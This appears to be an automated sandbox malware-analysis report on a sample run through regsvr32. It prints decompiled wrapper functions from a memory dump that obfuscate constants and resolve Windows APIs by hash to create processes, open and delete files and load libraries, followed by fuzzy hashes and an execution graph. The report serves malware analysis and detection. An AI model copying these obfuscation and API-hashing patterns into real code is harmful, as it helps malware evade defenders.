                                                                                                                0x0099e3ae
                                                                                                                0x0099e3b5
                                                                                                                0x0099e3bc
                                                                                                                0x0099e3c3
                                                                                                                0x0099e3cf
                                                                                                                0x0099e3d5
                                                                                                                0x0099e3d8
                                                                                                                0x0099e3df
                                                                                                                0x0099e3e6
                                                                                                                0x0099e3ed
                                                                                                                0x0099e3f4
                                                                                                                0x0099e40b
                                                                                                                0x0099e413
                                                                                                                0x0099e426
                                                                                                                0x0099e42f
                                                                                                                0x0099e435

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00993F2A,00000000), ref: 0099E42F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: M8
                                                                                                                • API String ID: 2962429428-669864304
                                                                                                                • Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction ID: e0a2d3f0ba47aa1c577ee173fcc567427f681cf14c684c83cd36cca81d50a939
                                                                                                                • Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction Fuzzy Hash: AF1159B5D00209FFDF58DFA4C94989EBBB4EB40324F108299E824B6291D7B55B058F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009946E0 Relevance: 1.6, APIs: 1, Instructions: 76processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E009946E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00989E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E0099BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}











                                                                                                                0x009946e8
                                                                                                                0x009946ed
                                                                                                                0x009946ef
                                                                                                                0x009946f2
                                                                                                                0x009946f5
                                                                                                                0x009946f8
                                                                                                                0x009946f9
                                                                                                                0x009946fc
                                                                                                                0x009946ff
                                                                                                                0x00994702
                                                                                                                0x00994703
                                                                                                                0x00994706
                                                                                                                0x00994709
                                                                                                                0x0099470c
                                                                                                                0x0099470d
                                                                                                                0x00994710
                                                                                                                0x00994713
                                                                                                                0x00994716
                                                                                                                0x00994717
                                                                                                                0x00994719
                                                                                                                0x0099471e
                                                                                                                0x00994727
                                                                                                                0x0099472e
                                                                                                                0x00994732
                                                                                                                0x00994739
                                                                                                                0x00994740
                                                                                                                0x00994747
                                                                                                                0x0099474e
                                                                                                                0x00994755
                                                                                                                0x0099475c
                                                                                                                0x00994763
                                                                                                                0x0099476a
                                                                                                                0x00994771
                                                                                                                0x0099477d
                                                                                                                0x00994783
                                                                                                                0x00994786
                                                                                                                0x0099478d
                                                                                                                0x009947ae
                                                                                                                0x009947ca
                                                                                                                0x009947d1

                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 009947CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction ID: 1527d46e88213b0e5d177ae504deafafa3b4c0b47ddf6cc7ec9c121ef4737e32
                                                                                                                • Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction Fuzzy Hash: 1531F272900248FBDF559F95DD09CDEBF76FB89314F008188FA2462220D7B69A60EF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0099BF1C Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E0099BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00989E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E0099BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}










                                                                                                                0x0099bf24
                                                                                                                0x0099bf29
                                                                                                                0x0099bf2b
                                                                                                                0x0099bf2e
                                                                                                                0x0099bf2f
                                                                                                                0x0099bf30
                                                                                                                0x0099bf33
                                                                                                                0x0099bf36
                                                                                                                0x0099bf39
                                                                                                                0x0099bf3c
                                                                                                                0x0099bf3f
                                                                                                                0x0099bf42
                                                                                                                0x0099bf43
                                                                                                                0x0099bf44
                                                                                                                0x0099bf49
                                                                                                                0x0099bf53
                                                                                                                0x0099bf5a
                                                                                                                0x0099bf61
                                                                                                                0x0099bf68
                                                                                                                0x0099bf6c
                                                                                                                0x0099bf70
                                                                                                                0x0099bf77
                                                                                                                0x0099bf7e
                                                                                                                0x0099bf85
                                                                                                                0x0099bf9c
                                                                                                                0x0099bfa4
                                                                                                                0x0099bfab
                                                                                                                0x0099bfb2
                                                                                                                0x0099bfb6
                                                                                                                0x0099bfba
                                                                                                                0x0099bfbe
                                                                                                                0x0099bfd1
                                                                                                                0x0099bfe8
                                                                                                                0x0099bfef

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 0099BFE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction ID: 6c4923c7645590d22a528ee0593711693675b9e72400f05ffa94a618cddb0fcd
                                                                                                                • Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction Fuzzy Hash: 7221E57680020DBBCF15DF96D9498DFBFB5FB84748F108198F925A2221D3B68A64DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00991B22 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00991B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00989E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E0099BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}












                                                                                                                0x00991b2a
                                                                                                                0x00991b2d
                                                                                                                0x00991b2f
                                                                                                                0x00991b31
                                                                                                                0x00991b34
                                                                                                                0x00991b37
                                                                                                                0x00991b3a
                                                                                                                0x00991b3b
                                                                                                                0x00991b3c
                                                                                                                0x00991b41
                                                                                                                0x00991b50
                                                                                                                0x00991b54
                                                                                                                0x00991b61
                                                                                                                0x00991b64
                                                                                                                0x00991b6b
                                                                                                                0x00991b72
                                                                                                                0x00991b79
                                                                                                                0x00991b7d
                                                                                                                0x00991b84
                                                                                                                0x00991b8b
                                                                                                                0x00991b92
                                                                                                                0x00991b99
                                                                                                                0x00991ba0
                                                                                                                0x00991ba7
                                                                                                                0x00991bae
                                                                                                                0x00991bc2
                                                                                                                0x00991bc5
                                                                                                                0x00991bd8
                                                                                                                0x00991be5
                                                                                                                0x00991bec

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 00991BE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction ID: 0a0a9db021efeaef299bcc91a6fd6d079e4e85a527879b8c30eb161d2ec6429d
                                                                                                                • Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction Fuzzy Hash: 6E2133B5D00208FBDF05DFA5C94A8EEBFB5FB80714F108089E915A6261D3B45B41DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009966C2 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E009966C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E00989E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E0099BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}











                                                                                                                0x009966cf
                                                                                                                0x009966e4
                                                                                                                0x009966e9
                                                                                                                0x009966f3
                                                                                                                0x009966f7
                                                                                                                0x009966fe
                                                                                                                0x00996705
                                                                                                                0x0099670c
                                                                                                                0x00996710
                                                                                                                0x00996717
                                                                                                                0x0099671e
                                                                                                                0x00996725
                                                                                                                0x00996729
                                                                                                                0x0099672d
                                                                                                                0x00996734
                                                                                                                0x0099673b
                                                                                                                0x00996742
                                                                                                                0x00996766
                                                                                                                0x00996777
                                                                                                                0x0099677e

                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 00996777
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction ID: 9be74d531d55f2f7979c4c5a0423ad5998279bf0a76726e59e7e3ee6c9a7ba50
                                                                                                                • Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction Fuzzy Hash: 3C1142B2800208FBCF15DFA5CC0A8DEBFB8EF85704F108198E92962211D3B18A64DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0098FCB5 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E0098FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E00989E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E0099BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}












                                                                                                                0x0098fcbc
                                                                                                                0x0098fcbf
                                                                                                                0x0098fcc1
                                                                                                                0x0098fcc3
                                                                                                                0x0098fcc8
                                                                                                                0x0098fcd6
                                                                                                                0x0098fcdb
                                                                                                                0x0098fce0
                                                                                                                0x0098fce7
                                                                                                                0x0098fcee
                                                                                                                0x0098fcf5
                                                                                                                0x0098fcfc
                                                                                                                0x0098fd03
                                                                                                                0x0098fd0d
                                                                                                                0x0098fd13
                                                                                                                0x0098fd16
                                                                                                                0x0098fd1d
                                                                                                                0x0098fd24
                                                                                                                0x0098fd2b
                                                                                                                0x0098fd4f
                                                                                                                0x0098fd58
                                                                                                                0x0098fd5e

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0098FD58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction ID: 568746016d74270856a637dfe886c69ece092804acce6a93ee149ed6160dca80
                                                                                                                • Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction Fuzzy Hash: 65112A71E00218FBDB18DFA5D84A9EEBFB5EB44304F108189E42AA6251DBB56B148B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00989EA8 Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00989EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00989E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E0099BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}










                                                                                                                0x00989eaf
                                                                                                                0x00989eb2
                                                                                                                0x00989eb4
                                                                                                                0x00989eb8
                                                                                                                0x00989eb9
                                                                                                                0x00989ebe
                                                                                                                0x00989ec8
                                                                                                                0x00989ecf
                                                                                                                0x00989ed6
                                                                                                                0x00989edd
                                                                                                                0x00989ee1
                                                                                                                0x00989ee5
                                                                                                                0x00989eec
                                                                                                                0x00989ef3
                                                                                                                0x00989efa
                                                                                                                0x00989f01
                                                                                                                0x00989f08
                                                                                                                0x00989f0f
                                                                                                                0x00989f16
                                                                                                                0x00989f1d
                                                                                                                0x00989f24
                                                                                                                0x00989f48
                                                                                                                0x00989f51
                                                                                                                0x00989f57

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 00989F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction ID: f184f05af987e18dc299ae25cfb1e857f6ca8865f246574b5f511f3d77954483
                                                                                                                • Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction Fuzzy Hash: 96111CB1C11619FBDF44DFA4D94A4DEBBB4EF10318F108288E81566251E7B45B548F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0098BA9C Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E0098BA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E0099BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}








                                                                                                                0x0098baa2
                                                                                                                0x0098baa9
                                                                                                                0x0098baad
                                                                                                                0x0098bab4
                                                                                                                0x0098babb
                                                                                                                0x0098babf
                                                                                                                0x0098bac6
                                                                                                                0x0098bacd
                                                                                                                0x0098bad4
                                                                                                                0x0098badb
                                                                                                                0x0098bae6
                                                                                                                0x0098baee
                                                                                                                0x0098baf6
                                                                                                                0x0098bafa
                                                                                                                0x0098bb12
                                                                                                                0x0098bb1d

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00116E69), ref: 0098BB1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction ID: 0739f03a8d3d29aab7368d8ed7f4ee5a2da977d4ac7c0304dc388f9b215ffec2
                                                                                                                • Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction Fuzzy Hash: BC010475D1120CEB8F04DFA8DA4A9DEBBB4FB04348F108599E821B7211D7B55B04CF81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:16.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1056
                                                                                                                Total number of Limit Nodes:16
                                                                                                                execution_graph 5119 5788e5 5120 578a5e 5119->5120 5121 578aa9 5120->5121 5122 58e18b 2 API calls 5120->5122 5123 578a79 5122->5123 5127 5808c0 5123->5127 5126 57b9d7 GetPEB 5126->5121 5128 5808e5 5127->5128 5130 578a91 5128->5130 5131 5819a4 5128->5131 5130->5126 5132 5819bd 5131->5132 5133 58bff0 GetPEB 5132->5133 5134 581a63 5133->5134 5134->5128 3845 5863f0 3846 58641e 3845->3846 3855 57b184 3846->3855 3850 586676 3854 586683 3850->3854 3863 58e373 3850->3863 3852 5866a3 3853 58e373 2 API calls 3852->3853 3853->3854 3856 57b19a 3855->3856 3867 58c0df 3856->3867 3859 5846e0 3860 58471e 3859->3860 3861 58bff0 GetPEB 3860->3861 3862 5847b3 CreateProcessW 3861->3862 3862->3850 3864 58e389 3863->3864 3865 58bff0 GetPEB 3864->3865 3866 58e42b CloseHandle 3865->3866 3866->3852 3868 58c0fa 3867->3868 3871 58e0ca 3868->3871 3872 58e0e7 3871->3872 3875 58bff0 3872->3875 3876 58c0a6 3875->3876 3880 57b1f9 3875->3880 3881 591ae9 3876->3881 3878 58c0ba 3884 58b558 3878->3884 3880->3859 3888 58aa52 GetPEB 3881->3888 3883 591b98 3883->3878 3885 58b575 3884->3885 3886 58b64f 3885->3886 3889 58b384 3885->3889 3886->3880 3888->3883 3890 58b4de 3889->3890 3897 58e545 3890->3897 3893 58b520 3895 58b558 GetPEB 3893->3895 3896 58b54f 3893->3896 3895->3896 3896->3886 3898 58e558 3897->3898 3899 58bff0 GetPEB 3898->3899 3900 58b506 3899->3900 3900->3893 3901 58e9a4 3900->3901 3902 58e9b4 3901->3902 3903 58bff0 GetPEB 3902->3903 3904 58ea43 3903->3904 3904->3893 5106 5772cc 5107 57ffde GetPEB 5106->5107 5108 57750d 5107->5108 5109 58589f GetPEB 5108->5109 5110 577520 5109->5110 5111 57758b 5110->5111 5112 574bb4 2 API calls 5110->5112 5113 57753e 5112->5113 5114 58734a GetPEB 5113->5114 5115 577568 5114->5115 5116 57b9d7 GetPEB 5115->5116 5117 577577 5116->5117 5118 579ea8 2 API calls 5117->5118 5118->5111 5081 575c9a 5084 57617c 5081->5084 5082 576a8d GetPEB 5082->5084 5083 58bf1c 2 API calls 5083->5084 5084->5082 5084->5083 5085 579574 GetPEB 5084->5085 5086 57638f 5084->5086 5089 57ffde GetPEB 5084->5089 5090 58eaa3 2 API calls 5084->5090 5091 57638d 5084->5091 5094 58ab39 5084->5094 5098 58589f 5084->5098 5102 592727 5084->5102 5085->5084 5088 58e373 2 API calls 5086->5088 5088->5091 5089->5084 5090->5084 5095 58ab6c 5094->5095 5096 58bff0 GetPEB 5095->5096 5097 58ac10 5096->5097 5097->5084 5099 5858b2 5098->5099 5100 58bff0 GetPEB 5099->5100 5101 585949 5100->5101 5101->5084 5103 592737 5102->5103 5104 58bff0 GetPEB 5103->5104 5105 5927d3 5104->5105 5105->5084 3905 57e1a9 3910 581fd0 3905->3910 3907 57e295 3947 57ba9c 3907->3947 3909 57e2ab 3944 5833d3 3910->3944 